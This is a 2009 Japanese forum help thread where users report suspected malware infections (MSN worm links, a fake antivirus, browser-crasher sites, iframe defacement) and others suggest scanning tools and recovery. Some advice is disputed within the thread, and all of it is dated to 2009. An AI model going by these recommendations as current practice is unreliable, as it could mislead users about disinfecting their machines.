友人からMSNメッセンジャーで送りつけられた変なURLを踏んでしまい、
自分もメッセンジャー経由で他人にURLをばら撒くようになってしまいました。
自分がばら撒いたことは自分ではわかりません。
その時のメッセージは
-------------------------------------------
○○の発言 :
Obama http://オバマwebcam.com/
-------------------------------------------
(オバマ → obama)
といったものだったと思います。
このURLでググっても日本語サイトが出てこないため、対策がわかりません。
どなたか、よろしくお願いします。
164:名無しさん@お腹いっぱい。
09/09/23 16:08:03
クリーンインストール
165:名無しさん@お腹いっぱい。
09/09/24 02:01:21
PC初心者です。携帯から失礼します
【使用OS】 WindowsVista
【症状】 tora3aux.exeが認証を求めています。の表示が下の黒いバーに出てる。
ファイルは怖くて開いてないんで、被害は無く、自動アップデートには失敗してくれるんで大丈夫なんですが、トロイですよね?
消したいんですが、どうすればいいんでしょうか?
166:名無しさん@お腹いっぱい。
09/09/24 04:03:47
Windows,vistaで画面の下にある黒いバーの部分に「tora3aux,exeがアクセス許可を求... - Yahoo!知恵袋
167:名無しさん@お腹いっぱい。
09/09/24 10:29:58
>>165
携帯から失礼します。
釣りなんだろ?
168:名無しさん@お腹いっぱい。
09/10/05 00:45:54
URLリンク(www.amigo.in)
これは何?
検査しても何も出てこないんだが平気?
169:名無しさん@お腹いっぱい。
09/10/05 01:25:04
URLリンク(futabakikaku.com)
↑
これウイルス仕込まれてたページみたいなんだけど、
踏んだとき404エラーになっててもウイルスって感染するのかな?
170:名無しさん@お腹いっぱい。
09/10/05 01:45:11
>>168
いわゆるブラクラ。 大量にFLASH再生が立ち上がってPCの動作がおかしくなる。(ウイルスは仕込まれて無いっぽい。)
とりあえずGoogle SafeBrowsingに攻撃サイトとして報告しておいた。
>>169
普通は感染しない。(そのページは現在本当に404)
ただし、ちょっと前に、404のページに見せかけて裏で隠して攻撃コード仕込むサイトがMDLに載っていたので、
404に見えるからって安心できない。
# こういう心理の落とし穴を使うタイプ(表示が404だから裏で起きていることを警戒しないタイプ)は凄いタチ悪いと思う...orz
171:名無しさん@お腹いっぱい。
09/10/05 01:53:42
>>170
ご回答ありがとうございます。
(そのページは現在本当に404)とありますが、
=感染していない、という捉え方で宜しいですか?
重ね重ねすみません。。
172:名無しさん@お腹いっぱい。
09/10/05 02:04:31
>>171
とりあえず、私が見た時点(1:40頃)は何もなかった。ので、私とそれ程変わらない時間に見たんなら
大丈夫(感染してない)だと思う。
まあ、こういうのって心配しはじめるとキリが無いんだけどね。(w 心配ならシマンテックとかマカフィー,
カスペルスキーとかのオンラインスキャンをやっておけばいいと思う。
※ 自分が使っていないソフト会社のオンラインスキャンをするのが良い。
173:名無しさん@お腹いっぱい。
09/10/05 02:08:27
>>172
configとか書いてるのに本当に手が滑って押しちゃって・・・。
ありがとうございましたー。
174:名無しさん@お腹いっぱい。
09/10/05 02:18:14
私もURLリンク(www.amigo.in) 踏んじゃいました・・・
一瞬表示されてすぐに消したんだけど・・・
今のところPCは動いてるんだけど、兄のPCなんで壊したら叱られちゃう
175:初心者
09/10/05 19:22:47
【使用OS】 「SP3」
【Microsoft Update(MU)の状態】 「on」
【使用セキュリティソフトとバージョン】 「AVG8.5420」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【スパイウェア対策ソフト】 「SuperAntiSpyware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「yes」
【ルータの有無】 「?」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
トロイなんたら。
パニくって反射的に削除してしまいました。
再スキャンしたら、大丈夫でした。
ニフティのオンラインスキャンしたら、ウィルスを一つ検出しました。
用心のために、リカバリしたほうがいいでしょうか?
気がつかないでショッピングサイトにログイン
(退会するためでしたが)したのが怖いです。
マイドキュメントのファイル、読まれてしまったかな・・・。
176:175
09/10/05 19:25:40
すいません、常時AVGを使っていて、
ニフティのオンラインスキャンしたらいつ出たってことです。
AVGのバカ。
177:175
09/10/05 19:26:58
ニフティのオンラインスキャンは、カスペルスキーです。
パニ食っててすいません。
178:名無しさん@お腹いっぱい。
09/10/05 19:34:20
>>177
大丈夫かなと思ってそのまま使い続けても、不安は完全には拭い切れないでそ?
ならリカバリしたほうが精神衛生的にもイイと思う
それで改めてアンチウイルスソフトの選定すればいいかなと
179:175
09/10/05 19:50:23
>>178
そうですね、
どうもありがとうございました!
180:名無しさん@お腹いっぱい。
09/10/06 23:13:20
【使用OS】XP
【Microsoft Update(MU)の状態】手動
【使用セキュリティソフトとバージョン】ノートン
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】いいえ
【スパイウェア対策ソフト】ad-aware spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】はい
【ルータの有無】わかりません
スキャンした結果、トロイの木馬が3つ見つかり、削除済みです。
しかしURLリンク(188.165.18.19)
が頻繁に勝手に開かれるという症状は改善されません。
alertfindやcanfind等のサイトも勝手に開かれているみたいです。
ネット等で調べましたが、対処方法がわかりません。
よろしくお願いします。
181:名無しさん@お腹いっぱい。
09/10/06 23:25:33
mixiのウイルスって未だに活動してんの?
さっきいつもどおりにログインしようとしたらカスペさんが「やばいっすよ」と教えてくれた
まさか新種じゃないよね?
182:八頭 ◆YAGApwSaEw
09/10/06 23:27:37
>>180
●IPA 情報処理推進機構
「 USB メモリのセキュリティ対策を意識していますか? 」 Windowsの自動実行(オートラン)機能を無効にする
※USBメモリの使用に関わらず設定しておくこと!
URLリンク(www.ipa.go.jp)
URLリンク(oldtimer.geekstogo.com)
OTL.exeをデスクトップへダウンロード
アクティブなプログラムウインドウをすべて閉じて、OTL.exeを実行
左列下部にある「Extra Registry」箇所をUse Safelistにチェックを入れて、
上段にある「Scan All Users」の箇所にチェックを入れてから、左上の「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTL.txt」がメモ帳で開いて、デスクトップ上にテキストで自動的に保存されています
「OTL.Txt」と「Extra.txt」がメモ帳で開いて、デスクトップ上に2つのテキストで自動的に保存されています
RootRepeal
URLリンク(rootrepeal.googlepages.com)
RootRepealの最新バージョン(The latest version)をデスクトップへダウンロード
RootRepeal.rar解凍し、アクティブなプログラムウインドウをすべて閉じて、RootRepeal.exeを実行
下列から「Report」タブを選択、左下の「Scan」ボタンをクリック
「Select Scan」ダイアログが表示されるので、すべてにチェックを入れて > OK
次にScanするドライブを問われるので、「C:\」にチェックを入れて > OK > Scan走査がスタート(*Scan中は「Files」タブです)
ログ抽出走査が終了すると、
「RootRepeal report 月-日-09 (×-×-×).txt」がメモ帳で開いて、C:にテキストで自動的に保存されています
183:八頭 ◆YAGApwSaEw
09/10/06 23:30:53
Windowsの自動実行(オートラン)機能を無効にする した後、一度PC再起動
【スパイウェア対策ソフト】ad-aware spybot ← 2つとも保護機能をすべて解除してからアンインストールしておいて下さい
つづき
OTLとRootRepealのログを新規フォルダへコピー貼り付け移動して、フォルダを圧縮
圧縮フォルダ名を[ Report ] - Infection log reportとして以下へ提出
■Symantec Security Response 〔Upload a suspected infected file : 疑わしいファイルの提出〕
URLリンク(submit.symantec.com)
184:名無しさん@お腹いっぱい。
09/10/06 23:31:13
>>181
うちのカスぺさんも「やばいっすよ」と教えてくれた
友人のバスターは無反応らしい
185:170
09/10/06 23:54:49
>>168
ども。 oppai.htmlをaviraに判定依頼送ったら、JS/BrowserCrasher.A. (新種)って返事が来た。
って、検出名そのまんまかよ。(w
# まだVDFには反映されてません。 なんで、Virustotalは0/41のままです。 Avira一番乗りかな?
>>174
先日の時は、別にウイルスに感染する訳じゃなかったようなので、再起動して問題なければ大丈夫かと。
ただ、こういうブラウザの制御が効かなくなるヤツは、裏で新種マルウェアが組み込まれると厄介だから、お互い気をつけましょう。
ちなみに、googleの方はまだ対応してませんね。 amigo.inのサイトは生きているから、注意お願いします。
(googleは再送してみます。)
186:名無しさん@お腹いっぱい。
09/10/07 16:59:21
フリーソフトを入れるとPC壊れるって書いてるやつがwww
こんなこと本気で思ってんのかこいつwww
それにしても頓珍漢な回答するやつも多いなwww
URLリンク(oshiete.filesend.to)
187: ◆N9P3SuvBPo
09/10/07 21:36:18
>186
専門家と名乗ってる人ですよね。
フリーソフトがuser.dllだか、kernel32.dllを削除したせいで、OSが壊れてしまった…と。
普通、専門家の方なら誤検出を予測するでしょう。
188:名無しさん@お腹いっぱい。
09/10/07 22:18:09
メールがたくさん送りつけられるウィルスって何なのでしょうか?
189:名無しさん@お腹いっぱい。
09/10/07 23:36:03
2009/10/07 22:35:17
スタートアップ検査
システムメモリに入り込んだ
Win32/Olmarik
トロイの木馬を
駆除できません
くぐっても情報が無いので分かる方
教えを下さい
190:八頭 ◆YAGApwSaEw
09/10/07 23:46:47
>>189
これだけ教えてくれるかな
【使用OS】 『』 例、Vista sp3 (「システムのプロパティ」参照)
【PCスペック】 『CPU: GHz 、メモリ: MB』 (「システムのプロパティ」参照)
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】 『』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『』
191:名無しさん@お腹いっぱい。
09/10/07 23:55:23
【使用OS】 『Microsoft Windows XP Home Edition』
【使用ブラウザ】『OperaTor』
【Microsoft Updateの更新の状態】『自動更新設定』
【セキュリティソフトと年式】『ESET NOD32 Antivirus』
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』
【回線の種類・ルータの有無】『ADSL回線』
CPU名 Intel(R) Pentium(R) M processor 1.60GHz
物理メモリ空き容量 32 MB
ページファイル空き容量 614 MB
仮想メモリ空き容量 1997 MB
192:八頭 ◆YAGApwSaEw
09/10/08 00:02:48
【セキュリティソフトと年式】『ESET NOD32 Antivirus』 → アンインストールしてNIS2010体験版に入れ替える
【その他スパイウェア対策ソフト】『Spybot - Search & Destroy』 → 保護機能を解除してからアンインストール
ノートンシリーズの体験版 (*30日間すべての機能を利用できます)
URLリンク(www.symantecstore.jp)
Spybotの代わりに「a-squared Free 4.5」と「Avira AntiVir Personal 8」 を導入する
スレリンク(sec板:8番)
193:名無しさん@お腹いっぱい。
09/10/08 00:13:20
低スペックにノートンはきついので
Spybotの代わりに「a-squared Free 4.5で検査してきます
有り難う御座いました。
194:八頭 ◆YAGApwSaEw
09/10/08 00:22:17
a-squared Free 4.5が一番重いよw
195: ◆N9P3SuvBPo
09/10/08 02:02:14
>189
リカバリしましょう。
ついでに192は根本的に間違ってますのでしないように。
192は常駐型アンチウイルスの同居を奨めています!
本気で助けたいと思うのなら、既存のセキュリティソフトを消せとか言いませんよ、普通は!
196:八頭 ◆YAGApwSaEw
09/10/08 02:39:47
>>◆N9P3SuvBPo
>システムメモリに入り込んだ とあるからね
悪党はリカバリ退避まで見越しているんじゃないの?
スレリンク(sec板:8番)
それから、ここのはすべて組み合わせてウチで併用確認済みだよ
197:八頭 ◆YAGApwSaEw
09/10/08 02:45:57
>>◆N9P3SuvBPo
URLリンク(i.imagehost.org)
198:名無しさん@お腹いっぱい。
09/10/08 12:21:13
★質問用テンプレ★
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「norton Internet Security 2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されている」
【スパイウェア対策ソフト】 「スパイボット」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「していない」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
『ノートンがHDDの\Windows\temp\_ex08.exeにpacked Genericを検出し遮断してすぐ覚えのないセキュリティソフトが起動したので回線を切って再起動したところ
またそのセキュリティソフトが起動し下のリンクの携帯でとったスクリーンショットのようにウイルスがあるとのこと。
そのソフトが。右下にIE、FireFox、Outlookからパスワードをとるウイルスをみつけた的なことを英語で言う
タスクマネージャで12038418.exeが何かしていると思いよくみたら、HDDのC\Document and setting\all users\Application Data\12038418のフォルダにあり、
上記のよくわからないセキュリティソフトのアイコンでした』
【その他】 『Yahoo!ニュースでパスワードを持っていくウイルスが活躍中なのをみかけました』
【スクリーンショット】
URLリンク(i.imagehost.org)
どうするのがよいでしょうか
スクショのセキュリティソフトは信用していいのでしょうか?
199:名無しさん@お腹いっぱい。
09/10/08 13:34:31
>>198
スレリンク(sec板)l82から183を嫁
200:名無しさん@お腹いっぱい。
09/10/08 15:11:19
>>199ありがとうございます。
シマンテックに提出したところ、
We have analyzed your submission. The following is a report of our
findings for each file you have submitted:
filename: [ Report ] - Infection log report.zip
machine: Machine
result: See the developer notes
filename: 12038418.exe
machine: Machine
result: This file is detected as Suspicious.S.MLApp.
filename: 12038418.cfg
machine: Machine
result: See the developer notes
Customer notes:
Developer notes:
[ Report ] - Infection log report.zip is a container file of type ZIP
12038418.exe reserves one slot in Tier 1 for future malicious behavior category This file is contained by [ Report ] - Infection log report.zip
12038418.cfg Our automation was unable to identify any malicious content in this submission.
The file will be stored for further human analysis This file is contained by [ Report ] - Infection log report.zip
Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.
とメールがきたのですがこれはどういう意味でしょうか・・・?
201:名無しさん@お腹いっぱい。
09/10/08 15:20:16
英語で帰ってくんのかよ
202:名無しさん@お腹いっぱい。
09/10/08 17:36:01
専門用語とかはいってたらお手上げだよなぁ・・・
203:八頭 ◆YAGApwSaEw
09/10/08 20:53:30
>>200
ログと該当exeを提出したの?
LiveUpdateを行い、システムの完全スキャンをしてみるといいよ
【スパイウェア対策ソフト】 「スパイボット」 ← 役立たず
204:名無しさん@お腹いっぱい。
09/10/08 21:34:05
>>203ログはしてないです。最初に自動実行やめて再起動してしまったのでよくわからないけどログはのこってないのかとおもって・・・
205:八頭 ◆YAGApwSaEw
09/10/08 22:07:04
他にも感染があったかもしれないからログで診てもらえばよかったのに・・・
Nortonスレのテンプレも読んどいてね
206: ◆N9P3SuvBPo
09/10/09 00:26:04
>196
a-squared Free 4.5はともかく
Avira AntiVir Personal 9と併用しても問題ないと。
207:名無しさん@お腹いっぱい。
09/10/09 01:36:02
>>205いまからやってもおそいですか?
208: ◆N9P3SuvBPo
09/10/09 01:44:34
>>207
>>198ですよね?
間違い無くウイルスなのでリカバリしたほうが早いですよ。
209:198
09/10/09 03:35:07
>>208やっぱりリカバリですか・・・
12038418.exeをスタートアップから外したら見た目は問題なくなったんですけどやっぱりまだなにかあるかもしれないですよね
でも家族で共用のPCなので、自分以外が使ったときに今までと違うことがあったら対処できるのかもしんぱいです。
しかし仕事のファイルも作成したりすることがあるのでリカバリかなぁ・・・・
210:名無しさん@お腹いっぱい。
09/10/09 07:13:37
>>209
なおさらリカバリしなきゃダメです
211:名無しさん@お腹いっぱい。
09/10/09 16:50:41
>>209
もういないかな?
私も海外サイトを見ていたら、>>198と同じソフトが突然起動しはじめました。
ノートンでスキャンを実行すると「W32.Waledac」が検出されて削除。
この偽ソフト自体はセーフモードで削除しました。
偽ソフトの画像で検索すると↓下記の記事を見つけたけど、exeの名前とか微妙に違う。。
URLリンク(www.411-spyware.com)
連休はリカバリするか・・・
212:名無しさん@お腹いっぱい。
09/10/09 17:51:33
>>211
感染の心当たりはありますか?
213:名無しさん@お腹いっぱい。
09/10/09 18:56:27
>>212
海外のブログの広告を間違えてクリックしたら
エラー画面が出てPCがゴゴゴーと動きだしました
214:名無しさん@お腹いっぱい。
09/10/09 21:01:08
>>211こちらはノートン2010で完全スキャンかけてもなにもなかったんですけどねぇ
exeファイルのみをスキャンしてみても異常なしでした
いまから購入時の状態に戻します
ちなみに自分は中華サイトみてたら壁紙が灰色になってウイルス発見!って・・・
スタートアップやデスクトップにショートカットまでつくるなんてやるなぁ
信用してたらどうなってたのか怖い怖い
215:名無しさん@お腹いっぱい。
09/10/09 21:06:51
>>213
ありが㌧
216:214
09/10/09 21:09:56
ってよく読んだら偽のウイルスセキュリティソフトを購入させる気だったんですね
情報持って行くタイプでなかったからまだよかったけど、exe起動させられたからオルタナティブとかも起動させられたりできそうだな・・・
217:名無しさん@お腹いっぱい。
09/10/10 22:31:15
他の掲示板でも質問させてもらったですが、至急回答が欲しいのでこちらでも失礼します。
ウィルスなのかわからないのですが、
深夜2時に自動でPCが起動してしまって、音楽といーっひひとずっと子供の笑い声が響きます。
怖くなってしまい、すぐ電源を落としてしまったのですが、
一体原因は何なのでしょうか
218: ◆N9P3SuvBPo
09/10/10 22:52:41
「マルチ」というわけですね。
219:名無しさん@お腹いっぱい。
09/10/10 23:24:25
>>218
はい、申し訳ないですがその通りです。
何かご存じでしたら、教えてもらえないかと思います。
220:名無しさん@お腹いっぱい。
09/10/11 09:54:30
>>217
電源の切れたPCを勝手に立ち上げるマルウェア(ウイルス)は聞いたことがないが...
電源が入るのは、単に、BIOSの設定で Wake on LAN とか Wake on Ring みたいな
Wake on ~がONになっていて、それが動作しただけの気がする。
音楽と子供の笑い声は、実際どんなモンが再生されたのか不明なんで何とも。
(聞いたことある音楽なのか、心当たりのない音楽なのかで判断違うし)
気になるなら、まずはシマンテック,マカフィー,カスペあたりのオンラインスキャンを
やってみれば良いと思うよん。
221:八頭 ◆YAGApwSaEw
09/10/11 11:56:05
>>217
Bad Joke系は何故かAntiVirが強い
Avira AntiVir Personal (無料版)
URLリンク(www.free-av.com)
設定ポイント
URLリンク(i.imagehost.org)
222:名無しさん@お腹いっぱい。
09/10/12 00:20:25
【使用OS】 「windowsvista」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2010」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】はい 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「ADSL回線」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「毎日検索しているのですが、
毎回cookie_Doubliclickとcookie_overtureと言うものが検出されます、
削除しましたと出てきますが、検索したらほぼ毎回検出されます、これはウィルスなのでしょうか?
初心者で大変申し訳ないのですが、よろしくお願い致します」
223:名無しさん@お腹いっぱい。
09/10/12 00:32:27
cookie_Doubliclickとcookie_overtureを
グーグル検索すれば解決するんじゃないかな
224:名無しさん@お腹いっぱい。
09/10/12 00:41:36
>>223
ありがとうございます!
お手数おかけしてすみませんでした・・・。
225:名無しさん@お腹いっぱい。
09/10/12 23:58:55
<div style="display:none">iaadaacxfsvljiejsvakfhwmadlrwbo</div>というように
謎の31文字が埋め込まれるiframe型の改竄って、まとめて検出名ついていますか?
226:225
09/10/13 18:36:03
あくまでも不正サイトから何をダウンロードするか、であって、
改竄されているページに対しての名称はないみたいですね。。。
227:名無しさん@お腹いっぱい。
09/10/15 04:47:54
パソコンの右クリックが全く出来なくなってしまいました…
たぶんFLASHのゲームやったからなったとおもうんですけど……
インターネットの線は抜いたんですけど共有ルーター使ってるんでとても不安です
フォーマットしたほうがいいでしょうか?
228:名無しさん@お腹いっぱい。
09/10/15 04:55:42
↑左クリックでしたm(__)m
右クリックでメニューは出来ますが開けません…
229:名無しさん@お腹いっぱい。
09/10/15 14:58:22
★質問用テンプレ★
【使用OS】 「」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「」
【スパイウェア対策ソフト】 「」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「」
230:名無しさん@お腹いっぱい。
09/10/19 14:28:49
きちんと対策を行ったつもりなのですが、心配なので質問させて下さい。
【os】windows xp
【アップデートの状態】最新
【セキュリティソフト】ウィルスセキュリティゼロ/最新の状態(更新も頻繁に行っています)
【ルータの有無】有
ウィルスセキュリティにてスキャン中、「in the backdoor」と表示され、
怖くなって詳細を確認したところ、ファイル名「jword2.exe」と表示されました。
隔離されたのですが、心配なので削除を行い、
ノートンのオンラインスキャン→ウィルス検出されず
後、ウィルスセキュリティにて再度スキャン→検出されず
というような結果でした。ウィルスは完全に抹消されたと思っていいのでしょうか?
初心者ゆえ拙い文章ですみません。よろしくお願いします。